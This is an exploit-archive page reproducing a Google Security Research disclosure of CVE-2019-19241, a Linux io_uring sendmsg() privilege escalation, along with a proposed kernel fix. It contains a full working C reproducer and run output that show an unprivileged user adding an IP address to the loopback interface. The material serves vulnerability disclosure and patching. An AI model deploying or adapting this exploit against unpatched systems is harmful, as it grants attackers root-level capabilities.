exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux sendmsg() Privilege Escalation

Linux sendmsg() Privilege Escalation
Posted Dec 16, 2019
Authored by Jann Horn, Google Security Research

Linux suffers from a privilege escalation vulnerability via io_uring offload of sendmsg() onto kernel thread with kernel creds.

tags | exploit, kernel
systems | linux
advisories | CVE-2019-19241
SHA-256 | a834b29ddf4d2217f0c133698262209db2f3b93925e28fd750acde84f14c06eb

Linux sendmsg() Privilege Escalation

Change Mirror Download
Linux: privilege escalation via io_uring offload of sendmsg() onto kernel thread with kernel creds

Since commit 0fa03c624d8f (\"io_uring: add support for sendmsg()\", first in v5.3),
io_uring has support for asynchronously calling sendmsg().
Unprivileged userspace tasks can submit IORING_OP_SENDMSG submission queue
entries, which cause sendmsg() to be called either in syscall context in the
original task, or - if that wasn't able to send a message without blocking - on
a kernel worker thread.

The problem is that sendmsg() can end up looking at the credentials of the
calling task for various reasons; for example:

- sendmsg() with non-null, non-abstract ->msg_name on an unconnected AF_UNIX
datagram socket ends up performing filesystem access checks
- sendmsg() with SCM_CREDENTIALS on an AF_UNIX socket ends up looking at
process credentials
- sendmsg() with non-null ->msg_name on an AF_NETLINK socket ends up performing
capability checks against the calling process

When the request has been handed off to a kernel worker task, all such checks
are performed against the credentials of the worker - which are default kernel
creds, with UID 0 and full capabilities.

To force io_uring to hand off a request to a kernel worker thread, an attacker
can abuse the fact that the opcode field of the SQE is read multiple times, with
accesses to the struct msghdr in between: The attacker can first submit an SQE
of type IORING_OP_RECVMSG whose struct msghdr is in a userfaultfd region, and
then, when the userfaultfd triggers, switch the type to IORING_OP_SENDMSG.

Here's a reproducer for Linux 5.3 that demonstrates the issue by adding an
IPv4 address to the loopback interface without having the required privileges
for that:

==========================================================================
$ cat uring_sendmsg.c
#define _GNU_SOURCE
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/ioctl.h>
#include <linux/rtnetlink.h>
#include <linux/if_addr.h>
#include <linux/io_uring.h>
#include <linux/userfaultfd.h>
#include <linux/netlink.h>

#define SYSCHK(x) ({ \\
typeof(x) __res = (x); \\
if (__res == (typeof(x))-1) \\
err(1, \"SYSCHK(\" #x \")\"); \\
__res; \\
})

static int uffd = -1;
static struct iovec *iov;
static struct iovec real_iov;
static struct io_uring_sqe *sqes;

static void *uffd_thread(void *dummy) {
struct uffd_msg msg;
int res = SYSCHK(read(uffd, &msg, sizeof(msg)));
if (res != sizeof(msg)) errx(1, \"uffd read\");
printf(\"got userfaultfd message\
\");

sqes[0].opcode = IORING_OP_SENDMSG;

union {
struct iovec iov;
char pad[0x1000];
} vec = {
.iov = real_iov
};
struct uffdio_copy copy = {
.dst = (unsigned long)iov,
.src = (unsigned long)&vec,
.len = 0x1000
};
SYSCHK(ioctl(uffd, UFFDIO_COPY, &copy));
return NULL;
}

int main(void) {
// initialize uring
struct io_uring_params params = { };
int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, &params));
unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));

// prepare userfaultfd-trapped IO vector page
iov = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
uffd = SYSCHK(syscall(SYS_userfaultfd, 0));
struct uffdio_api api = { .api = UFFD_API, .features = 0 };
SYSCHK(ioctl(uffd, UFFDIO_API, &api));
struct uffdio_register reg = {
.mode = UFFDIO_REGISTER_MODE_MISSING,
.range = { .start = (unsigned long)iov, .len = 0x1000 }
};
SYSCHK(ioctl(uffd, UFFDIO_REGISTER, &reg));
pthread_t thread;
if (pthread_create(&thread, NULL, uffd_thread, NULL))
errx(1, \"pthread_create\");

// construct netlink message
int sock = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE));
struct sockaddr_nl addr = {
.nl_family = AF_NETLINK
};
struct {
struct nlmsghdr hdr;
struct ifaddrmsg body;
struct rtattr opthdr;
unsigned char addr[4];
} __attribute__((packed)) msgbuf = {
.hdr = {
.nlmsg_len = sizeof(msgbuf),
.nlmsg_type = RTM_NEWADDR,
.nlmsg_flags = NLM_F_REQUEST
},
.body = {
.ifa_family = AF_INET,
.ifa_prefixlen = 32,
.ifa_flags = IFA_F_PERMANENT,
.ifa_scope = 0,
.ifa_index = 1
},
.opthdr = {
.rta_len = sizeof(struct rtattr) + 4,
.rta_type = IFA_LOCAL
},
.addr = { 1, 2, 3, 4 }
};
real_iov.iov_base = &msgbuf;
real_iov.iov_len = sizeof(msgbuf);
struct msghdr msg = {
.msg_name = &addr,
.msg_namelen = sizeof(addr),
.msg_iov = iov,
.msg_iovlen = 1,
};

// send netlink message via uring
sqes[0] = (struct io_uring_sqe) {
.opcode = IORING_OP_RECVMSG,
.fd = sock,
.addr = (unsigned long)&msg
};
((int*)(sq_ring + params.sq_off.array))[0] = 0;
(*(int*)(sq_ring + params.sq_off.tail))++;
int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0));
printf(\"submitted %d, getevents done\
\", submitted);
int cq_tail = *(int*)(cq_ring + params.cq_off.tail);
printf(\"cq_tail = %d\
\", cq_tail);
if (cq_tail != 1) errx(1, \"expected cq_tail==1\");
struct io_uring_cqe *cqe = (void*)(cq_ring + params.cq_off.cqes);
if (cqe->res < 0) {
printf(\"result: %d (%s)\
\", cqe->res, strerror(-cqe->res));
} else {
printf(\"result: %d\
\", cqe->res);
}
}
$ gcc -Wall -pthread -o uring_sendmsg uring_sendmsg.c
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
$ ./uring_sendmsg
got userfaultfd message
submitted 1, getevents done
cq_tail = 1
result: 32
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet 1.2.3.4/32 scope global lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
$
==========================================================================

The way I see it, the easiest way to fix this would probably be to grab a
reference to the caller's credentials with get_current_cred() in
io_uring_create(), then let the entry code of all the kernel worker threads
permanently install these as their subjective credentials with override_creds().
(Or maybe commit_creds() - that would mean that you could actually see the
owning user of these threads in the output of something like \"ps aux\". On the
other hand, I'm not sure how that impacts stuff like signal sending, so
override_creds() might be safer.) It would mean that you can't safely use an
io_uring instance across something like a setuid() transition that drops
privileges, but that's probably not a big problem?

While the security bug was only introduced by the addition of IORING_OP_SENDMSG,
it would probably be beneficial to mark such a change for backporting all the
way to v5.1, when io_uring was added - I think e.g. the SELinux hook that is
called from rw_verify_area() has so far always attributed all the I/O operations
to the kernel context, which isn't really a security problem, but might e.g.
cause unexpected denials depending on the SELinux policy.

(For people who care about such things: I have requested a CVE identifier from MITRE for this.)


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Related CVE Numbers: CVE-2019-19241.



Found by: jannh@google.com

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    21 Files
  • 27
    Aug 27th
    28 Files
  • 28
    Aug 28th
    15 Files
  • 29
    Aug 29th
    41 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close